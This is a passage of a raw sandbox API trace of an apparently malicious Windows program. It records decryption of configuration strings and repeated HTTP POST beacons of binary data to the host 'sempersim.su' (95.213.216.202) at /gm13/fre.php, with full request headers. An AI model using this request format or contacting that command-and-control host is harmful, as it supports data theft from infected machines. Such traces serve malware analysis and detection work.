dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0250.648] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0250.648] CryptSetKeyParam (hKey=0x62d710, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0250.648] GetProcessHeap () returned 0x620000 [0250.648] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x638fd8 | out: hHeap=0x620000) returned 1 [0250.649] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0250.649] CryptDecrypt (in: hKey=0x62d710, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x643638, pdwDataLen=0x19fcfc | out: pbData=0x643638, pdwDataLen=0x19fcfc) returned 1 [0250.650] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0250.650] CryptDestroyKey (hKey=0x62d710) returned 1 [0250.651] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0250.652] CryptReleaseContext (hProv=0x63ba90, dwFlags=0x0) returned 1 [0250.652] GetProcessHeap () returned 0x620000 [0250.652] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x212) returned 0x646770 [0250.654] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0250.655] StrStrA (lpFirst="http://sempersim.su/gm13/fre.php", lpSrch="http://") returned="http://sempersim.su/gm13/fre.php" [0250.655] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0250.656] StrStrA (lpFirst="sempersim.su/gm13/fre.php", lpSrch="/") returned="/gm13/fre.php" [0250.656] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0250.657] StrStrA (lpFirst="sempersim.su/gm13/fre.php", lpSrch=":") returned 0x0 [0250.657] GetProcessHeap () returned 0x620000 [0250.657] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x633228 [0250.657] getaddrinfo (in: pNodeName="sempersim.su", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x63c2a8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x63ea78*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), ai_next=0x0)) returned 0 [0250.659] GetProcessHeap () returned 0x620000 [0250.659] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x63b560 [0250.659] socket (af=2, type=1, protocol=6) returned 0x3d4 [0250.659] connect (s=0x3d4, name=0x63ea78*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), namelen=16) returned 0 [0250.712] FreeAddrInfoW (pAddrInfo=0x63c2a8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x63ea78*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), ai_next=0x0)) [0250.712] GetProcessHeap () returned 0x620000 [0250.712] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x7d) returned 0x63ba90 [0250.712] GetProcessHeap () returned 0x620000 [0250.712] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x201b) returned 0x646d70 [0250.714] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0250.715] wvsprintfA (in: param_1=0x646d70, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /gm13/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0250.715] GetProcessHeap () returned 0x620000 [0250.715] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xae) returned 0x63d6b8 [0250.715] GetProcessHeap () returned 0x620000 [0250.716] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x646d70 | out: hHeap=0x620000) returned 1 [0250.716] GetProcessHeap () returned 0x620000 [0250.716] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3e) returned 0x643488 [0250.716] GetProcessHeap () returned 0x620000 [0250.716] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1fdc) returned 0x646d70 [0250.717] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0250.718] wvsprintfA (in: param_1=0x646d70, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /gm13/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 6585B194\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0250.718] GetProcessHeap () returned 0x620000 [0250.718] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xef) returned 0x63a880 [0250.718] GetProcessHeap () returned 0x620000 [0250.718] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x646d70 | out: hHeap=0x620000) returned 1 [0250.718] send (s=0x3d4, buf=0x63a880*, len=237, flags=0) returned 237 [0250.720] send (s=0x3d4, buf=0x6421e0*, len=159, flags=0) returned 159 [0250.720] GetProcessHeap () returned 0x620000 [0250.720] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xfd0) returned 0x646d70 [0250.720] recv (in: s=0x3d4, buf=0x646d70, len=4048, flags=0 | out: buf=0x646d70*) returned 237 [0252.521] GetProcessHeap () returned 0x620000 [0252.522] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63a880 | out: hHeap=0x620000) returned 1 [0252.522] GetProcessHeap () returned 0x620000 [0252.522] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x643488 | out: hHeap=0x620000) returned 1 [0252.522] GetProcessHeap () returned 0x620000 [0252.523] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63d6b8 | out: hHeap=0x620000) returned 1 [0252.523] GetProcessHeap () returned 0x620000 [0252.524] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63ba90 | out: hHeap=0x620000) returned 1 [0252.524] closesocket (s=0x3d4) returned 0 [0252.525] GetProcessHeap () returned 0x620000 [0252.525] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b560 | out: hHeap=0x620000) returned 1 [0252.525] GetProcessHeap () returned 0x620000 [0252.525] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x646770 | out: hHeap=0x620000) returned 1 [0252.525] GetProcessHeap () returned 0x620000 [0252.526] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x643638 | out: hHeap=0x620000) returned 1 [0252.534] GetProcessHeap () returned 0x620000 [0252.534] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x633228 | out: hHeap=0x620000) returned 1 [0252.540] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x646d70, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x238) returned 0x3d4 [0252.542] Sleep (dwMilliseconds=0xea60) [0252.570] GetProcessHeap () returned 0x620000 [0252.570] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x643050 [0252.579] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0252.580] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0252.591] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0252.592] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x63bcb0) returned 1 [0252.598] GetProcessHeap () returned 0x620000 [0252.598] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x639308 [0252.599] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0252.599] CryptImportKey (in: hProv=0x63bcb0, pbData=0x639308*, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x62d190) returned 1 [0252.600] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0252.600] CryptSetKeyParam (hKey=0x62d190, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0252.601] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0252.601] CryptSetKeyParam (hKey=0x62d190, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0252.601] GetProcessHeap () returned 0x620000 [0252.601] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x639308 | out: hHeap=0x620000) returned 1 [0252.602] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0252.602] CryptDecrypt (in: hKey=0x62d190, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x643050, pdwDataLen=0x19fcfc | out: pbData=0x643050, pdwDataLen=0x19fcfc) returned 1 [0252.609] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0252.609] CryptDestroyKey (hKey=0x62d190) returned 1 [0252.610] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0252.610] CryptReleaseContext (hProv=0x63bcb0, dwFlags=0x0) returned 1 [0252.610] GetProcessHeap () returned 0x620000 [0252.611] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x212) returned 0x646320 [0252.611] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0252.612] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0252.612] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0252.613] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0252.613] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0252.614] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0252.614] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0252.615] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0252.615] GetProcessHeap () returned 0x620000 [0252.615] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x633228 [0252.624] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0252.624] GetProcessHeap () returned 0x620000 [0252.625] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x633228 | out: hHeap=0x620000) returned 1 [0252.628] GetProcessHeap () returned 0x620000 [0252.628] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x646320 | out: hHeap=0x620000) returned 1 [0252.628] GetProcessHeap () returned 0x620000 [0252.628] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x643050 | out: hHeap=0x620000) returned 1 [0252.629] GetProcessHeap () returned 0x620000 [0252.629] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x642dc8 [0252.630] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0252.630] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0252.640] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0252.640] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x63ba08) returned 1 [0252.647] GetProcessHeap () returned 0x620000 [0252.647] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x639308 [0252.648] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0252.648] CryptImportKey (in: hProv=0x63ba08, pbData=0x639308*, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x62d710) returned 1 [0252.649] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0252.649] CryptSetKeyParam (hKey=0x62d710, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0252.649] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0252.650] CryptSetKeyParam (hKey=0x62d710, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0252.650] GetProcessHeap () returned 0x620000 [0252.650] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x639308 | out: hHeap=0x620000) returned 1 [0252.654] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0252.654] CryptDecrypt (in: hKey=0x62d710, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x642dc8, pdwDataLen=0x19fcfc | out: pbData=0x642dc8, pdwDataLen=0x19fcfc) returned 1 [0252.655] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0252.656] CryptDestroyKey (hKey=0x62d710) returned 1 [0252.657] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0252.657] CryptReleaseContext (hProv=0x63ba08, dwFlags=0x0) returned 1 [0252.657] GetProcessHeap () returned 0x620000 [0252.657] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x212) returned 0x644d90 [0252.658] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0252.658] StrStrA (lpFirst="http://sempersim.su/gm13/fre.php", lpSrch="http://") returned="http://sempersim.su/gm13/fre.php" [0252.659] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0252.660] StrStrA (lpFirst="sempersim.su/gm13/fre.php", lpSrch="/") returned="/gm13/fre.php" [0252.660] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0252.661] StrStrA (lpFirst="sempersim.su/gm13/fre.php", lpSrch=":") returned 0x0 [0252.661] GetProcessHeap () returned 0x620000 [0252.661] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x6332a0 [0252.661] getaddrinfo (in: pNodeName="sempersim.su", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x63bee8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x63ec70*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), ai_next=0x0)) returned 0 [0252.666] GetProcessHeap () returned 0x620000 [0252.666] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x63b500 [0252.666] socket (af=2, type=1, protocol=6) returned 0x3d8 [0252.666] connect (s=0x3d8, name=0x63ec70*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), namelen=16) returned 0 [0252.839] FreeAddrInfoW (pAddrInfo=0x63bee8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x63ec70*(sa_family=2, sin_port=0x50, sin_addr="95.213.216.202"), ai_next=0x0)) [0252.839] GetProcessHeap () returned 0x620000 [0252.839] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x7d) returned 0x63b7e8 [0252.839] GetProcessHeap () returned 0x620000 [0252.839] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x201b) returned 0x646d70 [0252.840] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0252.842] wvsprintfA (in: param_1=0x646d70, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /gm13/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0252.842] GetProcessHeap () returned 0x620000 [0252.842] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xae) returned 0x63d6b8 [0252.842] GetProcessHeap () returned 0x620000 [0252.843] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x646d70 | out: hHeap=0x620000) returned 1 [0252.843] GetProcessHeap () returned 0x620000 [0252.843] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x3e) returned 0x643488 [0252.843] GetProcessHeap () returned 0x620000 [0252.843] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1fdc) returned 0x646d70 [0252.844] LoadLibraryW (lpLibFileName="user32") returned 0x74f40000 [0252.844] wvsprintfA (in: param_1=0x646d70, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /gm13/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 6585B194\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0252.844] GetProcessHeap () returned 0x620000 [0252.845] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xef) returned 0x63a880 [0252.845] GetProcessHeap () returned 0x620000 [0252.845] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x646d70 | out: hHeap=0x620000) returned 1 [0252.845] send (s=0x3d8, buf=0x63a880*, len=237, flags=0) returned 237 [0252.846] send (s=0x3d8, buf=0x6421e0*, len=159, flags=0) returned 159 [0252.846] GetProcessHeap () returned 0x620000 [0252.846] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xfd0) returned 0x646d70 [0252.846] recv (in: s=0x3d8, buf=0x646d70, len=4048, flags=0 | out: buf=0x646d70*) returned 237 [0254.649] GetProcessHeap () returned 0x620000 [0254.650] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63a880 | out: hHeap=0x620000) returned 1 [0254.650] GetProcessHeap () returned 0x620000 [0254.650] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x643488 | out: hHeap=0x620000) returned 1 [0254.650] GetProcessHeap () returned 0x620000 [0254.651] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63d6b8 | out: hHeap=0x620000) returned 1 [0254.651] GetProcessHeap () returned 0x620000 [0254.651] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b7e8 | out: hHeap=0x620000) returned 1 [0254.651] closesocket (s=0x3d8) returned 0 [0254.653] GetProcessHeap () returned 0x620000 [0254.654] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x63b500 | out: hHeap=0x620000) returned 1 [0254.654] GetProcessHeap () returned 0x620000 [0254.654] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x644d90 | out: hHeap=0x620000) returned 1 [0254.654] GetProcessHeap () returned 0x620000 [0254.654] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x642dc8 | out: hHeap=0x620000) returned 1 [0254.654] GetProcessHeap () returned 0x620000 [0254.654] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x6332a0 | out: hHeap=0x620000) returned 1 [0254.665] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x646d70, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x838) returned 0x3d8 [0254.671] Sleep (dwMilliseconds=0xea60) [0254.697] GetProcessHeap () returned 0x620000 [0254.697] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x642f78 [0254.698] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0254.699] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0254.711] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0254.711] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x63ba08) returned 1 [0254.749] GetProcessHeap () returned 0x620000 [0254.749] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x639098 [0254.750] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0254.750] CryptImportKey (in: hProv=0x63ba08, pbData=0x639098*, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x62d710) returned 1 [0254.751] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0254.751] CryptSetKeyParam (hKey=0x62d710, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0254.752] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0254.752] CryptSetKeyParam (hKey=0x62d710, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0254.752] GetProcessHeap () returned 0x620000 [0254.752] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x639098 | out: hHeap=0x620000) returned 1 [0254.753] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0254.753] CryptDecrypt (in: hKey=0x62d710, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x642f78, pdwDataLen=0x19fcfc | out: pbData=0x642f78, pdwDataLen=0x19fcfc) returned 1 [0254.754] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0254.754] CryptDestroyKey (hKey=0x62d710) returned 1 [0254.755] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0254.755] CryptReleaseContext (hProv=0x63ba08, dwFlags=0x0) returned 1 [0254.755] GetProcessHeap () returned 0x620000 [0254.755] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x212) returned 0x645408 [0254.756] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0254.756] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0254.757] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0254.757] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0254.758] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0254.758] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0254.759] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0254.759] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0254.759] GetProcessHeap () returned 0x620000 [0254.759] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x633228 [0254.759] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x8c\x9a\x92\x8f\x9a\x8d\x8c\x96\x92Ñ\x8c\x8aÐ\x98\x92ÎÌÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0254.760] GetProcessHeap () returned 0x620000 [0254.760] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x633228 | out: hHeap=0x620000) returned 1 [0254.760] GetProcessHeap () returned 0x620000 [0254.760] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x645408 | out: hHeap=0x620000) returned 1 [0254.760] GetProcessHeap () returned 0x620000 [0254.761] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x642f78 | out: hHeap=0x620000) returned 1 [0254.761] GetProcessHeap () returned 0x620000 [0254.761] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x642ea0 [0254.762] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0254.762] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0254.769] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0254.769] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x63b7e8) returned 1 [0254.861] GetProcessHeap () returned 0x620000 [0254.861] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x638f78 [0254.861] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0254.862] CryptImportKey (in: hProv=0x63b7e8, pbData=0x638f78*, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x62d190) returned 1 [0254.862] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0254.863] CryptSetKeyParam (hKey=0x62d190, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0254.863] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0254.863] CryptSetKeyParam (hKey=0x62d190, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0254.863] GetProcessHeap () returned 0x620000 [0254.864] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x638f78 | out: hHeap=0x620000) returned 1 [0254.864] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0254.865] CryptDecrypt (in: hKey=0x62d190, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x642ea0, pdwDataLen=0x19fcfc | out: pbData=0x642ea0, pdwDataLen=0x19fcfc) returned 1 [0254.865] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0254.865] CryptDestroyKey (hKey=0x62d190) returned 1 [0254.866] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x77420000 [0254.866] CryptReleaseContext (hProv=0x63b7e8, dwFlags=0x0) returned 1 [0254.866] GetProcessHeap () returned 0x620000 [0254.866] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x212) returned 0x645630 [0254.867] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0254.867] StrStrA (lpFirst="http://sempersim.su/gm13/fre.php", lpSrch="http://") returned="http://sempersim.su/gm13/fre.php" [0254.868] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0254.868] StrStrA (lpFirst="sempersim.su/gm13/fre.php", lpSrch="/") returned="/gm13/fre.php" [0254.868] LoadLibraryW (lpLibFileName="shlwapi") returned 0x74df0000 [0254.869] StrStrA (lpFirst="sempersim.su/gm13/fre.php", lpSrch=":") returned 0x0 [0254.869] GetProcessHeap () returned 0x620000 [0254.869] RtlAllocateHeap 